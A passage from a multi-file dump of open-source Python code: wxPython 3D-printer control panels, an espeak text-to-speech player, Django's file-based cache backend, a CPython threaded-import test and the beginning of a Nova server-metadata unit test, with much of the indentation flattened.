if '(' not in root.btemp.Value:
root.btemp.SetValue(root.btemp.Value + ' (user)')
if '(' not in root.htemp.Value:
root.htemp.SetValue(root.htemp.Value + ' (user)')
# Speed control #
speedpanel = root.newPanel(parentpanel)
speedsizer = wx.BoxSizer(wx.HORIZONTAL)
speedsizer.Add(wx.StaticText(speedpanel, -1, _("Print speed:")), flag = wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT)
root.speed_slider = wx.Slider(speedpanel, -1, 100, 1, 300)
speedsizer.Add(root.speed_slider, 1, flag = wx.EXPAND)
root.speed_spin = FloatSpin(speedpanel, -1, value = 100, min_val = 1, max_val = 300, digits = 0, style = wx.ALIGN_LEFT, size = (60, -1))
speedsizer.Add(root.speed_spin, 0, flag = wx.ALIGN_CENTER_VERTICAL)
root.speed_label = wx.StaticText(speedpanel, -1, _("%"))
speedsizer.Add(root.speed_label, flag = wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_RIGHT)
def speedslider_set(event):
root.do_setspeed()
root.speed_setbtn.SetBackgroundColour(wx.NullColour)
root.speed_setbtn = make_button(speedpanel, _("Set"), speedslider_set, _("Set print speed factor"), size = (38, -1), style = wx.BU_EXACTFIT)
root.printerControls.append(root.speed_setbtn)
speedsizer.Add(root.speed_setbtn, flag = wx.ALIGN_CENTER)
speedpanel.SetSizer(speedsizer)
add("speedcontrol", speedpanel, flag = wx.EXPAND | wx.TOP | wx.BOTTOM, border = off_top)
def speedslider_spin(event):
value = root.speed_spin.GetValue()
root.speed_setbtn.SetBackgroundColour("red")
root.speed_slider.SetValue(value)
root.speed_spin.Bind(wx.EVT_SPINCTRL, speedslider_spin)
def speedslider_scroll(event):
value = root.speed_slider.GetValue()
root.speed_setbtn.SetBackgroundColour("red")
root.speed_spin.SetValue(value)
root.speed_slider.Bind(wx.EVT_SCROLL, speedslider_scroll)
# Temperature gauges #
def hotendgauge_scroll_setpoint(e):
rot = e.GetWheelRotation()
if rot > 0:
root.do_settemp(str(root.hsetpoint + 1))
elif rot < 0:
root.do_settemp(str(max(0, root.hsetpoint - 1)))
def bedgauge_scroll_setpoint(e):
rot = e.GetWheelRotation()
if rot > 0:
root.do_bedtemp(str(root.bsetpoint + 1))
elif rot < 0:
root.do_bedtemp(str(max(0, root.bsetpoint - 1)))
if root.display_gauges:
for i in range(0, root.settings.extruders):
            root.hottgauge[i] = TempGauge(parentpanel, size = (-1, 24), title = _("Heater") + " " + str(i) + ":", maxval = 300, bgcolor = root.bgcolor)
add("htemp_gauge" + str(i), root.hottgauge[i], flag = wx.EXPAND)
root.hottgauge[i].Bind(wx.EVT_MOUSEWHEEL, hotendgauge_scroll_setpoint)
else:
root.hottgauge[0] = TempGauge(parentpanel, size = (-1, 24), title = _("Heater:"), maxval = 300, bgcolor = root.bgcolor)
add("htemp_gauge0", root.hottgauge[0], flag = wx.EXPAND)
root.hottgauge[0].Bind(wx.EVT_MOUSEWHEEL, hotendgauge_scroll_setpoint)
root.bedtgauge = TempGauge(parentpanel, size = (-1, 24), title = _("Bed:"), maxval = 150, bgcolor = root.bgcolor)
add("btemp_gauge", root.bedtgauge, flag = wx.EXPAND)
root.bedtgauge.Bind(wx.EVT_MOUSEWHEEL, bedgauge_scroll_setpoint)
# Temperature (M105) feedback display #
root.tempdisp = wx.StaticText(parentpanel, -1, "", style = wx.ST_NO_AUTORESIZE)
def on_tempdisp_size(evt):
root.tempdisp.Wrap(root.tempdisp.GetSize().width)
root.tempdisp.Bind(wx.EVT_SIZE, on_tempdisp_size)
def tempdisp_setlabel(label):
wx.StaticText.SetLabel(root.tempdisp, label)
root.tempdisp.Wrap(root.tempdisp.GetSize().width)
root.tempdisp.SetSize((-1, root.tempdisp.GetBestSize().height))
root.tempdisp.SetLabel = tempdisp_setlabel
add("tempdisp", root.tempdisp, flag = wx.EXPAND)
# Temperature graph #
if root.display_graph:
root.graph = Graph(parentpanel, wx.ID_ANY, root)
add("tempgraph", root.graph, flag = wx.EXPAND | wx.ALL, border = 5)
root.graph.Bind(wx.EVT_LEFT_DOWN, root.graph.show_graph_window)
# Extrusion controls #
# Extrusion settings
esettingspanel = root.newPanel(parentpanel)
esettingssizer = wx.GridBagSizer()
esettingssizer.SetEmptyCellSize((0, 0))
root.edist = FloatSpin(esettingspanel, -1, value = root.settings.last_extrusion, min_val = 0, max_val = 1000, size = (70, -1), digits = 1)
root.edist.SetBackgroundColour((225, 200, 200))
root.edist.SetForegroundColour("black")
root.edist.Bind(wx.EVT_SPINCTRL, root.setfeeds)
root.edist.Bind(wx.EVT_TEXT, root.setfeeds)
add("edist_label", wx.StaticText(esettingspanel, -1, _("Length:")), container = esettingssizer, flag = wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_LEFT | wx.RIGHT | wx.LEFT, border = 5)
add("edist_val", root.edist, container = esettingssizer, flag = wx.ALIGN_CENTER | wx.RIGHT, border = 5)
unit_label = _("mm") if mini_mode else _("mm @")
add("edist_unit", wx.StaticText(esettingspanel, -1, unit_label), container = esettingssizer, flag = wx.ALIGN_CENTER | wx.RIGHT, border = 5)
root.edist.SetToolTip(wx.ToolTip(_("Amount to Extrude or Retract (mm)")))
if not mini_mode:
root.efeedc = FloatSpin(esettingspanel, -1, value = root.settings.e_feedrate, min_val = 0, max_val = 50000, size = (70, -1), digits = 1)
root.efeedc.SetToolTip(wx.ToolTip(_("Extrude / Retract speed (mm/min)")))
root.efeedc.SetBackgroundColour((225, 200, 200))
root.efeedc.SetForegroundColour("black")
root.efeedc.Bind(wx.EVT_SPINCTRL, root.setfeeds)
root.efeedc.Bind(wx.EVT_TEXT, root.setfeeds)
add("efeed_val", root.efeedc, container = esettingssizer, flag = wx.ALIGN_CENTER | wx.RIGHT, border = 5)
add("efeed_label", wx.StaticText(esettingspanel, -1, _("Speed:")), container = esettingssizer, flag = wx.ALIGN_LEFT)
add("efeed_unit", wx.StaticText(esettingspanel, -1, _("mm/\nmin")), container = esettingssizer, flag = wx.ALIGN_CENTER)
else:
root.efeedc = None
esettingspanel.SetSizer(esettingssizer)
add("esettings", esettingspanel, flag = wx.ALIGN_LEFT)
if not standalone_mode:
econtrolpanel = root.newPanel(parentpanel)
econtrolsizer = wx.BoxSizer(wx.HORIZONTAL)
if root.settings.extruders > 1:
etool_sel_panel = econtrolpanel
etool_label = wx.StaticText(etool_sel_panel, -1, _("Tool:"))
if root.settings.extruders == 2:
root.extrudersel = wx.Button(etool_sel_panel, -1, "0", style = wx.BU_EXACTFIT)
root.extrudersel.SetToolTip(wx.ToolTip(_("Click to switch current extruder")))
def extrudersel_cb(event):
if root.extrudersel.GetLabel() == "1":
new = "0"
else:
new = "1"
root.extrudersel.SetLabel(new)
root.tool_change(event)
root.extrudersel.Bind(wx.EVT_BUTTON, extrudersel_cb)
root.extrudersel.GetValue = root.extrudersel.GetLabel
root.extrudersel.SetValue = root.extrudersel.SetLabel
else:
choices = [str(i) for i in range(0, root.settings.extruders)]
root.extrudersel = wx.ComboBox(etool_sel_panel, -1, choices = choices,
style = wx.CB_DROPDOWN | wx.CB_READONLY,
size = (50, -1))
root.extrudersel.SetToolTip(wx.ToolTip(_("Select current extruder")))
root.extrudersel.SetValue(choices[0])
root.extrudersel.Bind(wx.EVT_COMBOBOX, root.tool_change)
root.printerControls.append(root.extrudersel)
if mini_mode:
add("etool_label", etool_label, container = esettingssizer, flag = wx.ALIGN_CENTER)
add("etool_val", root.extrudersel, container = esettingssizer)
else:
econtrolsizer.Add(etool_label, flag = wx.ALIGN_CENTER)
econtrolsizer.Add(root.extrudersel)
econtrolpanel.SetSizer(econtrolsizer)
add("ext_controls", econtrolpanel, flag = wx.EXPAND | wx.TOP, border = off_top)
ebuttonspanel = root.newPanel(parentpanel)
ebuttonssizer = wx.BoxSizer(wx.HORIZONTAL)
for key in ["extrude", "reverse", "chktemp"]:
desc = root.cpbuttons[key]
btn = make_custom_button(root, ebuttonspanel, desc,
style = wx.BU_EXACTFIT)
ebuttonssizer.Add(btn, 1, flag = wx.EXPAND)
ebuttonspanel.SetSizer(ebuttonssizer)
add("ebuttons", ebuttonspanel, flag = wx.EXPAND | wx.BOTTOM, border = off_top)
else:
for key, btn in extra_buttons.items():
add(key, btn, flag = wx.EXPAND)
class ControlsSizer(wx.GridBagSizer):
def __init__(self, root, parentpanel = None, standalone_mode = False, mini_mode = False):
super(ControlsSizer, self).__init__()
if not parentpanel: parentpanel = root.panel
if mini_mode: self.make_mini(root, parentpanel)
else: self.make_standard(root, parentpanel, standalone_mode)
def make_standard(self, root, parentpanel, standalone_mode):
lltspanel = root.newPanel(parentpanel)
llts = wx.BoxSizer(wx.HORIZONTAL)
lltspanel.SetSizer(llts)
self.Add(lltspanel, pos = (0, 0), span = (1, 6))
xyzpanel = root.newPanel(parentpanel)
self.xyzsizer = XYZControlsSizer(root, xyzpanel)
xyzpanel.SetSizer(self.xyzsizer)
self.Add(xyzpanel, pos = (1, 0), span = (1, 6), flag = wx.ALIGN_CENTER)
self.extra_buttons = {}
pos_mapping = {"extrude": (4, 0),
"reverse": (4, 2),
"chktemp": (4, 4),
}
span_mapping = {"extrude": (1, 2),
"reverse": (1, 2),
"chktemp": (1, 2),
}
for key, desc in root.cpbuttons.items():
if not standalone_mode and key in ["extrude", "reverse", "chktemp"]:
continue
panel = lltspanel if key == "motorsoff" else parentpanel
btn = make_custom_button(root, panel, desc)
if key == "motorsoff":
llts.Add(btn)
elif not standalone_mode:
self.Add(btn, pos = pos_mapping[key], span = span_mapping[key], flag = wx.EXPAND)
else:
self.extra_buttons[key] = btn
root.xyfeedc = wx.SpinCtrl(lltspanel, -1, str(root.settings.xy_feedrate), min = 0, max = 50000, size = (70, -1))
root.xyfeedc.SetToolTip(wx.ToolTip(_("Set Maximum Speed for X & Y axes (mm/min)")))
llts.Add(wx.StaticText(lltspanel, -1, _("XY:")), flag = wx.ALIGN_RIGHT | wx.ALIGN_CENTER_VERTICAL | wx.LEFT, border = 5)
llts.Add(root.xyfeedc)
llts.Add(wx.StaticText(lltspanel, -1, _("mm/min Z:")), flag = wx.ALIGN_RIGHT | wx.ALIGN_CENTER_VERTICAL | wx.LEFT, border = 5)
root.zfeedc = wx.SpinCtrl(lltspanel, -1, str(root.settings.z_feedrate), min = 0, max = 50000, size = (70, -1))
root.zfeedc.SetToolTip(wx.ToolTip(_("Set Maximum Speed for Z axis (mm/min)")))
llts.Add(root.zfeedc,)
root.xyfeedc.Bind(wx.EVT_SPINCTRL, root.setfeeds)
root.zfeedc.Bind(wx.EVT_SPINCTRL, root.setfeeds)
root.xyfeedc.Bind(wx.EVT_TEXT, root.setfeeds)
root.zfeedc.Bind(wx.EVT_TEXT, root.setfeeds)
root.zfeedc.SetBackgroundColour((180, 255, 180))
root.zfeedc.SetForegroundColour("black")
if not standalone_mode:
add_extra_controls(self, root, parentpanel, None)
def make_mini(self, root, parentpanel):
root.xyb = XYButtonsMini(parentpanel, root.moveXY, root.homeButtonClicked,
root.spacebarAction, root.bgcolor,
zcallback = root.moveZ)
self.Add(root.xyb, pos = (1, 0), span = (1, 4), flag = wx.ALIGN_CENTER)
root.zb = ZButtonsMini(parentpanel, root.moveZ, root.bgcolor)
self.Add(root.zb, pos = (0, 4), span = (2, 1), flag = wx.ALIGN_CENTER)
wx.CallAfter(root.xyb.SetFocus)
pos_mapping = {"motorsoff": (0, 0),
}
span_mapping = {"motorsoff": (1, 4),
}
btn = make_custom_button(root, parentpanel, root.cpbuttons["motorsoff"])
self.Add(btn, pos = pos_mapping["motorsoff"], span = span_mapping["motorsoff"], flag = wx.EXPAND)
add_extra_controls(self, root, parentpanel, None, True)
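# --- Illustrative sketch (not part of the original file) ---
# A minimal, self-contained example of the pattern used by the speed
# control above: a wx.Slider and a FloatSpin mirror each other's value,
# and the "Set" button is tinted red until the pending value is applied.
# The names DemoSpeedPanel and apply_cb are hypothetical.
class DemoSpeedPanel(wx.Panel):
    def __init__(self, parent, apply_cb):
        super(DemoSpeedPanel, self).__init__(parent)
        self.apply_cb = apply_cb  # called with the confirmed value
        sizer = wx.BoxSizer(wx.HORIZONTAL)
        self.slider = wx.Slider(self, -1, 100, 1, 300)
        self.spin = FloatSpin(self, -1, value = 100, min_val = 1, max_val = 300, digits = 0)
        self.setbtn = wx.Button(self, -1, _("Set"))
        sizer.Add(self.slider, 1, flag = wx.EXPAND)
        sizer.Add(self.spin, 0, flag = wx.ALIGN_CENTER_VERTICAL)
        sizer.Add(self.setbtn, 0, flag = wx.ALIGN_CENTER)
        self.SetSizer(sizer)
        # Each control pushes its value into the other and flags the
        # unapplied change by colouring the Set button red.
        self.slider.Bind(wx.EVT_SCROLL, self.on_slider)
        self.spin.Bind(wx.EVT_SPINCTRL, self.on_spin)
        self.setbtn.Bind(wx.EVT_BUTTON, self.on_set)
    def on_slider(self, event):
        self.spin.SetValue(self.slider.GetValue())
        self.setbtn.SetBackgroundColour("red")
    def on_spin(self, event):
        self.slider.SetValue(int(self.spin.GetValue()))
        self.setbtn.SetBackgroundColour("red")
    def on_set(self, event):
        self.apply_cb(int(self.spin.GetValue()))
        self.setbtn.SetBackgroundColour(wx.NullColour)  # restore default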
|
zepto/clipspeak
|
refs/heads/master
|
clipspeak/speaker.py
|
1
|
#!/usr/bin/env python
# vim: sw=4:ts=4:sts=4:fdm=indent:fdl=0:
# -*- coding: UTF8 -*-
#
# An object for using espeak_text for 'playing' text.
# Copyright (C) 2013 Josiah Gordon <josiahg@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
""" Play espeak audio data to alsa.
"""
from multiprocessing import Process, Manager, Pipe
from io import SEEK_SET, SEEK_CUR, SEEK_END
from functools import wraps as functools_wraps
from time import sleep as time_sleep
from musio.alsa_io import Alsa as AudioDevice
from .espeak_text import EspeakText
class Reader(object):
""" Play audio files.
"""
def __init__(self):
""" Player(text, **kwargs) -> Speak text.
"""
self._text = ''
# Setup the msg_dict for sending messages to the child process.
self._msg_dict = Manager().dict()
# Create a pipe for sending and receiving messages.
self._control_conn, self._player_conn = Pipe()
    def __str__(self) -> str:
        """ Return the text that will be spoken.
        """
        return self._text
def __repr__(self) -> str:
""" __repr__ -> Returns a python expression to recreate this instance.
"""
repr_str = '' # "filename='%(_filename)s'" % self.__dict__
return '%s(%s)' % (self.__class__.__name__, repr_str)
def __enter__(self):
""" Provides the ability to use pythons with statement.
"""
try:
return self
except Exception as err:
print(err)
return None
def __exit__(self, exc_type, exc_value, traceback):
""" Stop playback when finished.
"""
try:
self.stop()
self._control_conn.close()
self._player_conn.close()
return not bool(exc_type)
except Exception as err:
print(err)
return False
def __del__(self):
""" Stop playback before deleting.
"""
pass
def __len__(self):
""" The length of the file if it has one.
"""
return self.length
def playing_wrapper(func):
""" Wrap methods and only call them if the stream is playing
"""
@functools_wraps(func)
def wrapper(self, *args, **kwargs):
""" Check if stream is playing and if it is then call func
otherwise print a message and exit.
"""
if not self.playing:
print("%(filename)s is not playing." % self._msg_dict)
return None
return func(self, *args, **kwargs)
return wrapper
    def _play_proc(self, msg_dict: dict, pipe):
        """ Player process: reads audio from espeak and writes it to the
        alsa device. pipe is one end of a multiprocessing.Pipe().
        """
# Open the file to play.
with EspeakText(**msg_dict) as fileobj:
# Put the file info in msg_dict.
# msg_dict['info'] = str(fileobj)
msg_dict['length'] = fileobj.length
# Open an audio output device that can handle the data from
# fileobj.
# with AudioDevice(rate=22050, channels=1) as device:
device = AudioDevice(rate=22050, channels=1)
try:
# Set the default number of loops to infinite.
fileobj.loops = msg_dict.get('loops', -1)
# Initialize variable.
buf = b'\x00' * device.buffer_size
written = 0
# Loop until stopped or nothing read or written.
while msg_dict['playing'] and (buf or written):
# Keep playing if not paused.
if not msg_dict.get('paused', False):
# Re-open the device if it was closed.
if device.closed:
device = AudioDevice(rate=22050, channels=1)
# Read the next buffer full of data.
buf = fileobj.readline()
# Write buf.
written = device.write(buf)
else:
# Close the device when paused and sleep to
# open the audio for another process and
# save cpu cycles.
if not device.closed:
device.close()
time_sleep(0.05)
# Write a buffer of null bytes so the audio
# system can keep its buffer full.
# device.write(b'\x00' * device.buffer_size)
# Get and process any commands from the parent process.
if pipe.poll():
# Get the data into temp.
command = pipe.recv()
if 'getposition' in command:
pipe.send(fileobj.position)
elif 'setposition' in command:
fileobj.position = command['setposition']
except Exception as err:
print(err)
finally:
if not device.closed:
device.close()
# Set playing to False for the parent.
msg_dict['playing'] = False
def read(self, text: str, **kwargs):
""" Read the text.
"""
self._text = text
self._msg_dict['text'] = text
self._msg_dict.update(kwargs)
# After opening a new file stop the current one from playing.
self.stop()
# Pause it.
self.pause()
# Start it playing so seeking works.
self.play()
def play(self):
""" play() -> Start playback.
"""
if not self._msg_dict.get('playing', False):
# Set playing to True for the child process.
self._msg_dict['playing'] = True
# Open a new process to play a file in the background.
self._play_p = Process(target=self._play_proc,
args=(self._msg_dict, self._player_conn))
# Start the process.
self._play_p.start()
elif self._msg_dict.get('paused', True):
# Un-pause if paused.
self._msg_dict['paused'] = False
def stop(self):
""" stop() -> Stop playback.
"""
if self._msg_dict.get('playing', False):
# Stop playback.
self._msg_dict['playing'] = False
# Wait for the player process to stop.
self._play_p.join()
# Un-Pause.
self._msg_dict['paused'] = False
def pause(self):
""" pause() -> Pause playback.
"""
# Pause playback.
self._msg_dict['paused'] = True
@property
def paused(self) -> bool:
""" True if playback is paused.
"""
return self._msg_dict.get('paused', False)
@property
def playing(self) -> bool:
""" True if playing.
"""
return self._msg_dict.get('playing', False)
@property
def length(self) -> int:
""" Length of audio.
"""
return self._msg_dict.get('length', 0)
@property
@playing_wrapper
def position(self) -> int:
""" Current position.
"""
self._control_conn.send('getposition')
return self._control_conn.recv()
@position.setter
@playing_wrapper
def position(self, value: int):
""" Set the current position.
"""
self._control_conn.send({'setposition': int(value)})
@playing_wrapper
def tell(self) -> int:
""" tell -> Returns the current position.
"""
return self.position
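# --- Illustrative sketch (not part of the original file) ---
# Rough usage of the Reader above; it assumes espeak and the musio alsa
# backend are installed. read() loads the text in a paused state, so
# playback is explicitly started with play() and polled until it ends.
if __name__ == '__main__':
    with Reader() as reader:
        reader.read("Hello from clipspeak.")
        reader.play()
        while reader.playing:
            time_sleep(0.1)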
|
adambrenecki/django
|
refs/heads/master
|
django/core/cache/backends/filebased.py
|
114
|
"File-based cache backend"
import hashlib
import os
import shutil
import time
try:
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
from django.core.cache.backends.base import BaseCache, DEFAULT_TIMEOUT
from django.utils.encoding import force_bytes
class FileBasedCache(BaseCache):
def __init__(self, dir, params):
BaseCache.__init__(self, params)
self._dir = dir
if not os.path.exists(self._dir):
self._createdir()
def add(self, key, value, timeout=DEFAULT_TIMEOUT, version=None):
if self.has_key(key, version=version):
return False
self.set(key, value, timeout, version=version)
return True
def get(self, key, default=None, version=None):
key = self.make_key(key, version=version)
self.validate_key(key)
fname = self._key_to_file(key)
try:
with open(fname, 'rb') as f:
exp = pickle.load(f)
now = time.time()
if exp is not None and exp < now:
self._delete(fname)
else:
return pickle.load(f)
except (IOError, OSError, EOFError, pickle.PickleError):
pass
return default
def set(self, key, value, timeout=DEFAULT_TIMEOUT, version=None):
key = self.make_key(key, version=version)
self.validate_key(key)
fname = self._key_to_file(key)
dirname = os.path.dirname(fname)
if timeout == DEFAULT_TIMEOUT:
timeout = self.default_timeout
self._cull()
try:
if not os.path.exists(dirname):
os.makedirs(dirname)
with open(fname, 'wb') as f:
expiry = None if timeout is None else time.time() + timeout
pickle.dump(expiry, f, pickle.HIGHEST_PROTOCOL)
pickle.dump(value, f, pickle.HIGHEST_PROTOCOL)
except (IOError, OSError):
pass
def delete(self, key, version=None):
key = self.make_key(key, version=version)
self.validate_key(key)
try:
self._delete(self._key_to_file(key))
except (IOError, OSError):
pass
def _delete(self, fname):
os.remove(fname)
try:
# Remove the 2 subdirs if they're empty
dirname = os.path.dirname(fname)
os.rmdir(dirname)
os.rmdir(os.path.dirname(dirname))
except (IOError, OSError):
pass
def has_key(self, key, version=None):
key = self.make_key(key, version=version)
self.validate_key(key)
fname = self._key_to_file(key)
try:
with open(fname, 'rb') as f:
exp = pickle.load(f)
now = time.time()
                if exp is not None and exp < now:
self._delete(fname)
return False
else:
return True
except (IOError, OSError, EOFError, pickle.PickleError):
return False
def _cull(self):
if int(self._num_entries) < self._max_entries:
return
try:
filelist = sorted(os.listdir(self._dir))
except (IOError, OSError):
return
if self._cull_frequency == 0:
doomed = filelist
else:
doomed = [os.path.join(self._dir, k) for (i, k) in enumerate(filelist) if i % self._cull_frequency == 0]
for topdir in doomed:
try:
for root, _, files in os.walk(topdir):
for f in files:
self._delete(os.path.join(root, f))
except (IOError, OSError):
pass
def _createdir(self):
try:
os.makedirs(self._dir)
except OSError:
            raise EnvironmentError("Cache directory '%s' does not exist and could not be created" % self._dir)
def _key_to_file(self, key):
"""
        Convert a cache key into an md5-hashed file path. The first few
        characters of the digest become two levels of directory prefixes,
        to be nice to filesystems that have problems with large numbers
        of files in a directory.
        Thus, a cache key of "foo" gets turned into a file named
        ``{cache-dir}ac/bd/18db4cc2f85cedef654fccc4a4d8`` (see the sketch
        at the end of this file).
"""
path = hashlib.md5(force_bytes(key)).hexdigest()
path = os.path.join(path[:2], path[2:4], path[4:])
return os.path.join(self._dir, path)
def _get_num_entries(self):
count = 0
        for _, _, files in os.walk(self._dir):
count += len(files)
return count
_num_entries = property(_get_num_entries)
def clear(self):
try:
shutil.rmtree(self._dir)
except (IOError, OSError):
pass
# For backwards compatibility
class CacheClass(FileBasedCache):
pass
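# --- Illustrative sketch (not part of Django; the helper name is
# hypothetical) ---
# Demonstrates the key -> path sharding performed by _key_to_file()
# above. Note that the real backend hashes the *versioned* key produced
# by make_key(), not the raw key shown here.
def _demo_key_to_file(cache_dir, key):
    digest = hashlib.md5(force_bytes(key)).hexdigest()
    # md5('foo') == 'acbd18db4cc2f85cedef654fccc4a4d8', so this returns
    # e.g. os.path.join(cache_dir, 'ac', 'bd', '18db4cc2f85cedef654fccc4a4d8')
    return os.path.join(cache_dir, digest[:2], digest[2:4], digest[4:])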
|
svanschalkwyk/datafari
|
refs/heads/master
|
windows/python/Lib/test/test_threaded_import.py
|
137
|
# This is a variant of the very old (early 90's) file
# Demo/threads/bug.py. It simply provokes a number of threads into
# trying to import the same module "at the same time".
# There are no pleasant failure modes -- most likely is that Python
# complains several times about module random having no attribute
# randrange, and then Python hangs.
import unittest
from test.test_support import verbose, TestFailed, import_module
thread = import_module('thread')
critical_section = thread.allocate_lock()
done = thread.allocate_lock()
def task():
global N, critical_section, done
import random
x = random.randrange(1, 3)
critical_section.acquire()
N -= 1
# Must release critical_section before releasing done, else the main
# thread can exit and set critical_section to None as part of global
# teardown; then critical_section.release() raises AttributeError.
finished = N == 0
critical_section.release()
if finished:
done.release()
def test_import_hangers():
import sys
if verbose:
print "testing import hangers ...",
import test.threaded_import_hangers
try:
if test.threaded_import_hangers.errors:
raise TestFailed(test.threaded_import_hangers.errors)
elif verbose:
print "OK."
finally:
# In case this test is run again, make sure the helper module
# gets loaded from scratch again.
del sys.modules['test.threaded_import_hangers']
# Tricky: When regrtest imports this module, the thread running regrtest
# grabs the import lock and won't let go of it until this module returns.
# All other threads attempting an import hang for the duration. Since
# this test spawns threads that do little *but* import, we can't do that
# successfully until after this module finishes importing and regrtest
# regains control. To make this work, a special case was added to
# regrtest to invoke a module's "test_main" function (if any) after
# importing it.
def test_main(): # magic name! see above
global N, done
import imp
if imp.lock_held():
# This triggers on, e.g., from test import autotest.
raise unittest.SkipTest("can't run when import lock is held")
done.acquire()
for N in (20, 50) * 3:
if verbose:
print "Trying", N, "threads ...",
for i in range(N):
thread.start_new_thread(task, ())
done.acquire()
if verbose:
print "OK."
done.release()
test_import_hangers()
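# --- Illustrative sketch (not part of the test; the helper name is
# hypothetical and it is never called here) ---
# The two-lock countdown used by task() above, rewritten with the
# higher-level threading module: each worker decrements a shared counter
# under one lock, and the last one out releases a second, pre-acquired
# "done" lock that the coordinating thread is blocked on.
def _demo_countdown_rendezvous(n=5):
    import threading
    counter_lock = threading.Lock()
    done = threading.Lock()
    state = {'remaining': n}
    def worker():
        counter_lock.acquire()
        state['remaining'] -= 1
        finished = state['remaining'] == 0
        counter_lock.release()
        if finished:
            done.release()
    done.acquire()
    for _ in range(n):
        threading.Thread(target=worker).start()
    done.acquire()  # blocks until the last worker releases it
    done.release()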
if __name__ == "__main__":
test_main()
|
bgxavier/nova
|
refs/heads/master
|
nova/tests/unit/api/openstack/compute/test_server_metadata.py
|
33
|
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
import mock
from oslo_config import cfg
from oslo_serialization import jsonutils
from oslo_utils import timeutils
import six
import webob
from nova.api.openstack.compute.plugins.v3 import server_metadata \
as server_metadata_v21
from nova.api.openstack.compute import server_metadata as server_metadata_v2
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import vm_states
import nova.db
from nova import exception
from nova import objects
from nova import test
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit import fake_instance
CONF = cfg.CONF
def return_create_instance_metadata_max(context, server_id, metadata, delete):
return stub_max_server_metadata()
def return_create_instance_metadata(context, server_id, metadata, delete):
return stub_server_metadata()
def fake_instance_save(inst, **kwargs):
inst.metadata = stub_server_metadata()
inst.obj_reset_changes()
def return_server_metadata(context, server_id):
if not isinstance(server_id, six.string_types) or not len(server_id) == 36:
msg = 'id %s must be a uuid in return server metadata' % server_id
raise Exception(msg)
return stub_server_metadata()
def return_empty_server_metadata(context, server_id):
return {}
def delete_server_metadata(context, server_id, key):
pass
def stub_server_metadata():
metadata = {
"key1": "value1",
"key2": "value2",
"key3": "value3",
}
return metadata
def stub_max_server_metadata():
metadata = {"metadata": {}}
for num in range(CONF.quota_metadata_items):
metadata['metadata']['key%i' % num] = "blah"
return metadata
def return_server(context, server_id, columns_to_join=None):
return fake_instance.fake_db_instance(
**{'id': server_id,
'uuid': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'locked': False,
'launched_at': timeutils.utcnow(),
'vm_state': vm_states.ACTIVE})
def return_server_by_uuid(context, server_uuid,
columns_to_join=None, use_slave=False):
return fake_instance.fake_db_instance(
**{'id': 1,
'uuid': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'locked': False,
'launched_at': timeutils.utcnow(),
'metadata': stub_server_metadata(),
'vm_state': vm_states.ACTIVE})
def return_server_nonexistent(context, server_id,
columns_to_join=None, use_slave=False):
raise exception.InstanceNotFound(instance_id=server_id)
def fake_change_instance_metadata(self, context, instance, diff):
pass
class ServerMetaDataTestV21(test.TestCase):
validation_ex = exception.ValidationError
validation_ex_large = validation_ex
def setUp(self):
super(ServerMetaDataTestV21, self).setUp()
fakes.stub_out_key_pair_funcs(self.stubs)
self.stubs.Set(nova.db, 'instance_get', return_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_by_uuid)
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_metadata)
self.stubs.Set(compute_rpcapi.ComputeAPI, 'change_instance_metadata',
fake_change_instance_metadata)
self._set_up_resources()
def _set_up_resources(self):
self.controller = server_metadata_v21.ServerMetadataController()
self.uuid = str(uuid.uuid4())
self.url = '/fake/servers/%s/metadata' % self.uuid
def _get_request(self, param_url=''):
return fakes.HTTPRequestV3.blank(self.url + param_url)
def test_index(self):
req = self._get_request()
res_dict = self.controller.index(req, self.uuid)
expected = {
'metadata': {
'key1': 'value1',
'key2': 'value2',
'key3': 'value3',
},
}
self.assertEqual(expected, res_dict)
def test_index_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_nonexistent)
req = self._get_request()
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.index, req, self.url)
def test_index_no_data(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_empty_server_metadata)
req = self._get_request()
res_dict = self.controller.index(req, self.uuid)
expected = {'metadata': {}}
self.assertEqual(expected, res_dict)
def test_show(self):
req = self._get_request('/key2')
res_dict = self.controller.show(req, self.uuid, 'key2')
expected = {"meta": {'key2': 'value2'}}
self.assertEqual(expected, res_dict)
def test_show_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_nonexistent)
req = self._get_request('/key2')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, self.uuid, 'key2')
def test_show_meta_not_found(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_empty_server_metadata)
req = self._get_request('/key6')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, self.uuid, 'key6')
def test_delete(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_metadata)
self.stubs.Set(nova.db, 'instance_metadata_delete',
delete_server_metadata)
req = self._get_request('/key2')
req.method = 'DELETE'
res = self.controller.delete(req, self.uuid, 'key2')
self.assertIsNone(res)
def test_delete_nonexistent_server(self):
